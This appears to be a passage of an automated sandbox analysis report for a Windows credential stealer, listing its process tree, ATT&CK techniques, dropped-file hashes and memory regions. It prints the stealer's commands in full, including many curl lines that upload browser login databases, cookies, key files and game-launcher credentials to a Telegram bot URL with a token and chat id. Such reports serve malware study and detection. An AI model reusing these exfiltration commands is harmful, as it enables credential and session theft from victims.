C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:6244

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:6280

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:5388

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:6256

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:6320

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:6356

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:6488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K DOOMSTEALER.cmd
2⤵
- Suspicious use of WriteProcessMemory
PID:4644

C:\Windows\system32\curl.exe
curl -s -o IP.txt https://ipv4.wtfismyip.com/text
3⤵
PID:1348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "Get-ComputerInfo"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1636

C:\Windows\system32\ipconfig.exe
ipconfig /all
3⤵
- Gathers network information
PID:6232

C:\Windows\system32\net.exe
net user
3⤵
PID:6256

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
4⤵
PID:6276

C:\Windows\system32\cmdkey.exe
cmdkey /list
3⤵
PID:6292

C:\Windows\system32\systeminfo.exe
SystemInfo
3⤵
- Gathers system information
PID:6308

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6804

C:\Windows\system32\curl.exe
curl -F document=@"userdata.txt" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:6848

C:\Windows\system32\reg.exe
REG QUERY HKEY_CURRENT_USER\Software\Roblox\RobloxStudioBrowser\roblox.com
3⤵
PID:6896

C:\Windows\system32\curl.exe
curl -F document=@"faggotblox.txt" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:6908

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:6948

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:6976

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Shortcuts" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:7020

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Bookmarks" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:7044

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:7068

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:7108

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Cookies" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:5368

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\History" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:2792

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Shortcuts" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:6240

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:6208

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Login Data" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:6304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles"
3⤵
PID:836

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8q8dp2fa.Admin\logins.json" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:6364

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8q8dp2fa.Admin\key3.db" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:6428

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8q8dp2fa.Admin\key4.db" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:756

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8q8dp2fa.Admin\cookies.sqlite" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:6708

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cb8l8xvz.default-release\logins.json" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:6660

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cb8l8xvz.default-release\key3.db" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:6656

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cb8l8xvz.default-release\key4.db" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:6776

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cb8l8xvz.default-release\cookies.sqlite" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:6820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Users\Admin\AppData\Roaming\discord\Local Storage\leveldb\"
3⤵
PID:6880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Users\Admin\AppData\Roaming\discordcanary\Local Storage\leveldb\"
3⤵
PID:6868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Users\Admin\AppData\Roaming\discordptb\Local Storage\leveldb\"
3⤵
- Blocklisted process makes network request
PID:6848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Users\Admin\AppData\Roaming\Lightcord\Local Storage\leveldb\"
3⤵
PID:6836

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\servers.dat" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:6924

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_msa_credentials.bin" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:6960

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_msa_credentials_microsoft_store.bin" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:6944

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_accounts.json" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:6980

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_accounts_microsoft_store.json" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:3336

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_product_state.json" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:7060

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_profiles.json" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:7084

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Program Files (x86)\Steam\config\loginusers.vdf" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:7072

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Program Files\Steam\config\loginusers.vdf" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:6740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Program Files (x86)\Steam\"
3⤵
PID:7096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Program Files\Steam\"
3⤵
PID:5220

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Local\Growtopia\save.dat" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:7156

C:\Windows\system32\curl.exe
curl -s -F document=@"C:\Users\Admin\AppData\Local\osu!\osu!.Admin.cfg" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
3⤵
PID:4248

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:2476

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1616

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:5144

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:5256

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:5324

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:5380

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:5488

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:5540

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:5600

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:5648

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:5696

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:5744

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dumbass.vbs"
2⤵
PID:5976

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dumbass.vbs"
2⤵
PID:6012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dumbass.vbs"
2⤵
- Suspicious use of FindShellTrayWindow
PID:6056

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dumbass.vbs"
2⤵
PID:6080

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dumbass.vbs"
2⤵
PID:6120

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\Distractions.html
2⤵
PID:6136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdf92a46f8,0x7ffdf92a4708,0x7ffdf92a4718
3⤵
PID:5176

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\Distractions.html
2⤵
PID:4028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdf92a46f8,0x7ffdf92a4708,0x7ffdf92a4718
3⤵
PID:5408

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:1088

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4092

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:5080

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:3676

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4368

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:628

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:2480

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:5092

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4044

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x498 0x2b8
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3540

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
a7134c5f7a65d606c63a36922e587450

SHA1
c7aebb450811d36a3c31d504e545edcbde2c67ac

SHA256
d28f17c59dbd744081992eadfddc16c8539bd04ecc1fd7499397fab24380beee

SHA512
f6748400e89255259ab0979af56457b8449b846228386b035068b0d6d3e374652d0e33f0d33aa8c49aca739a9fa03a30583a6886e869aa919607e7da9bd36177

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
a7134c5f7a65d606c63a36922e587450

SHA1
c7aebb450811d36a3c31d504e545edcbde2c67ac

SHA256
d28f17c59dbd744081992eadfddc16c8539bd04ecc1fd7499397fab24380beee

SHA512
f6748400e89255259ab0979af56457b8449b846228386b035068b0d6d3e374652d0e33f0d33aa8c49aca739a9fa03a30583a6886e869aa919607e7da9bd36177

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
612b19feac3b60bdc771ec888769ea75

SHA1
cc0117dc3f83e139f22d7c9f068a0fa2027fc8fb

SHA256
3eb12f5e02a7aad8764186e1f62d9cebcc8667c854ebf4356fe404f042b84ec1

SHA512
2f56333015641eb11b853a350ca5a01763ab9fd2d572fca51ba2d7df3018546c9667a64ba670e443e0fef5c10879964bfe18084ae0b44e95cb17dcc864ffd4af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
668de94c6f839b1d688b43e9bee629e2

SHA1
b80166f76629cde4385f5cfe0db999aa4806f59c

SHA256
a5d99083adc00b2d3cc2785118d543df433a2b459c429494fb1817de51f5c374

SHA512
a485876de7fbf6dc657c1a8af66b8e9114c5187da9b2d662348ecdc55bc0da5660ffc48684daae253ce8c38a51489da19480fb72ea26977d1d84c5112c302ab2

Download Submit
C:\Users\Admin\AppData\Local\Temp\DOOMCRYPTGUI.bat
Filesize
350B

MD5
654d2f95f8f20500140fb1766e2f0788

SHA1
06b15269f01ec4f4c8a1a1b955f13da749d790c0

SHA256
1ca4758c9e24a85677b6bfda67060d31afde2138963373975c110c6089b17935

SHA512
c6bcff35724480402f4d05cfa41ff8ff0d940582fd5f5a5b16d26de4cc7e2ec6a3f8e5a703c07e554c802ea86dc03a9f2d5f8cee2cefaa95c5915d136f498c75

Download Submit
C:\Users\Admin\AppData\Local\Temp\DOOMSTEALER.cmd
Filesize
4KB

MD5
cdd335be282034a772561ff1c3605517

SHA1
4e0a08f7137e95e38b9fb28ad59882dfc368bb48

SHA256
9f5a6a2adc71f135eed1b0dc41c01fbd21e41153bf62a98022c7650280a3592d

SHA512
ab97794115aab5130c2f9ed33f031eb26b06b9aa8a52ae39fe582745a4317089f7096966fadc948f21ff9b5de73cd22bafe940114641dfe7cbc7a104653266d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Distractions.html
Filesize
2KB

MD5
ad3850f99d4262ffadf20b129f52d0d3

SHA1
097675b0c36526c172a8282611c0261eeb4a7c20

SHA256
8bdc3330f8776327a2db63fde47f8521911c18426b0c57610fb312c0c0fd3229

SHA512
bd0157220c8a5fe37299f3b52e7c55272403f1667cf212bcab448bd9281e39b2cc8ca51d1274df50e43b344597b12e7f386ce0973569e4be795acdb9b12804f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\IP.txt
Filesize
13B

MD5
e3beb3e8f17d47540e27ced76dab15c4

SHA1
bd2d740fcd81ba1e73fcbed32fb77a71064309e7

SHA256
68d4db3c4a1651b5be32bfbd5571cdd2b603d3277475399672d94c77bbbb33e3

SHA512
f5c0e972bc0a2dbbb7b7dcbdc4582d19a812fc563f7c3d506b718252cecec337caeb43321ae9d1865b513c80ca32c26cb8a8161ca39fa4f1a1d87caea399ead0

Download Submit
C:\Users\Admin\AppData\Local\Temp\dumbass.vbs
Filesize
1KB

MD5
42fcc06e6a69528100bfdce13f9d2534

SHA1
301ec6f275cc127638d000d2c2662d10763267f6

SHA256
d989020fb9b40e52214ad0951ec9dd4e463b72b596a7e3926fbf0e84a42c2fd2

SHA512
f2eca2bd47fefa5315695f9ea468009466138f4cbbd4b2341d289f526c1cd82737ba960a499db2aeb5328f9d7185352e0e9257070378d131480af288ca8977d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\userdata.txt
Filesize
28KB

MD5
27db3b4cc20abc93130b5aba3bb27e0a

SHA1
b777d96ac44f4faaafb55e2af7f8fef0162ebaff

SHA256
baff2c022578a74d915468ef30b97971f42e7a1d56212abe3de36924470ef72f

SHA512
326761b5e4cf684a677f74120598926287f18b2bf859101edb3e0ab6283335c7bb420324e9b1d2a5585967846135953550b14400dc730b59f3afc7641db635a4

Download Submit
C:\Users\Admin\Desktop\Microsoft Edge.lnk
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_1764_RSADJULYEUJNIQCX
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/316-141-0x0000000000000000-mapping.dmp

Download
memory/624-151-0x0000000000000000-mapping.dmp

Download
memory/884-131-0x0000000000000000-mapping.dmp

Download
memory/1216-150-0x0000000000000000-mapping.dmp

Download
memory/1348-170-0x0000000000000000-mapping.dmp

Download
memory/1464-168-0x0000000000000000-mapping.dmp

Download
memory/1516-133-0x0000000000000000-mapping.dmp

Download
memory/1560-189-0x0000000000000000-mapping.dmp

Download
memory/1584-132-0x0000000000000000-mapping.dmp

Download
memory/1616-191-0x0000000000000000-mapping.dmp

Download
memory/1636-222-0x00000265ED900000-0x00000265EE3C1000-memory.dmp

Filesize
10.8MB

Download
memory/1636-154-0x0000000000000000-mapping.dmp

Download
memory/1636-155-0x0000026DB76E0000-0x0000026DB7702000-memory.dmp

Filesize
136KB

Download
memory/1636-156-0x00007FFDF87F0000-0x00007FFDF92B1000-memory.dmp

Filesize
10.8MB

Download
memory/1636-157-0x00007FFDF87F0000-0x00007FFDF92B1000-memory.dmp

Filesize
10.8MB

Download
memory/1636-219-0x00000265ED900000-0x00000265EE3C1000-memory.dmp

Filesize
10.8MB

Download
memory/1636-186-0x0000000000000000-mapping.dmp

Download
memory/1636-187-0x00000265ED900000-0x00000265EE3C1000-memory.dmp

Filesize
10.8MB

Download
memory/1760-179-0x0000000000000000-mapping.dmp

Download
memory/1764-164-0x0000000000000000-mapping.dmp

Download
memory/1940-140-0x0000000000000000-mapping.dmp

Download
memory/2080-174-0x0000000000000000-mapping.dmp

Download
memory/2120-142-0x0000000000000000-mapping.dmp

Download
memory/2152-185-0x0000000000000000-mapping.dmp

Download
memory/2212-181-0x0000000000000000-mapping.dmp

Download
memory/2384-136-0x0000000000000000-mapping.dmp

Download
memory/2476-190-0x0000000000000000-mapping.dmp

Download
memory/2736-130-0x0000000000000000-mapping.dmp

Download
memory/2788-147-0x0000000000000000-mapping.dmp

Download
memory/2840-171-0x0000000000000000-mapping.dmp

Download
memory/3684-153-0x0000000000000000-mapping.dmp

Download
memory/4036-137-0x0000000000000000-mapping.dmp

Download
memory/4168-162-0x00007FFDF87F0000-0x00007FFDF92B1000-memory.dmp

Filesize
10.8MB

Download
memory/4168-161-0x00007FFDF87F0000-0x00007FFDF92B1000-memory.dmp

Filesize
10.8MB

Download
memory/4168-158-0x0000000000000000-mapping.dmp

Download
memory/4292-148-0x0000000000000000-mapping.dmp

Download
memory/4348-176-0x0000000000000000-mapping.dmp

Download
memory/4412-134-0x0000000000000000-mapping.dmp

Download
memory/4492-135-0x0000000000000000-mapping.dmp

Download
memory/4540-146-0x0000000000000000-mapping.dmp

Download
memory/4576-152-0x0000000000000000-mapping.dmp

Download
memory/4644-166-0x0000000000000000-mapping.dmp

Download
memory/4720-139-0x0000000000000000-mapping.dmp

Download
memory/4796-138-0x0000000000000000-mapping.dmp

Download
memory/4836-145-0x0000000000000000-mapping.dmp

Download
memory/4904-173-0x0000000000000000-mapping.dmp

Download
memory/4952-149-0x0000000000000000-mapping.dmp

Download
memory/4980-165-0x0000000000000000-mapping.dmp

Download
memory/5000-144-0x0000000000000000-mapping.dmp

Download
memory/5012-183-0x0000000000000000-mapping.dmp

Download
memory/5064-143-0x0000000000000000-mapping.dmp

Download
memory/5144-192-0x0000000000000000-mapping.dmp

Download
memory/5176-216-0x0000000000000000-mapping.dmp

Download
memory/5256-193-0x0000000000000000-mapping.dmp

Download
memory/5324-194-0x0000000000000000-mapping.dmp

Download
memory/5380-195-0x0000000000000000-mapping.dmp

Download
memory/5404-197-0x0000000000000000-mapping.dmp

Download
memory/5488-198-0x0000000000000000-mapping.dmp

Download
memory/5540-199-0x0000000000000000-mapping.dmp

Download
memory/5600-200-0x0000000000000000-mapping.dmp

Download
memory/5648-201-0x0000000000000000-mapping.dmp

Download
memory/5696-202-0x0000000000000000-mapping.dmp

Download
memory/5744-203-0x0000000000000000-mapping.dmp

Download
memory/5772-205-0x0000000000000000-mapping.dmp

Download
memory/5800-207-0x0000000000000000-mapping.dmp

Download
memory/5944-208-0x0000000000000000-mapping.dmp

Download
memory/5976-209-0x0000000000000000-mapping.dmp

Download
memory/6012-210-0x0000000000000000-mapping.dmp

Download
memory/6056-212-0x0000000000000000-mapping.dmp

Download
memory/6080-213-0x0000000000000000-mapping.dmp

Download
memory/6120-214-0x0000000000000000-mapping.dmp

Download
memory/6136-215-0x0000000000000000-mapping.dmp

Download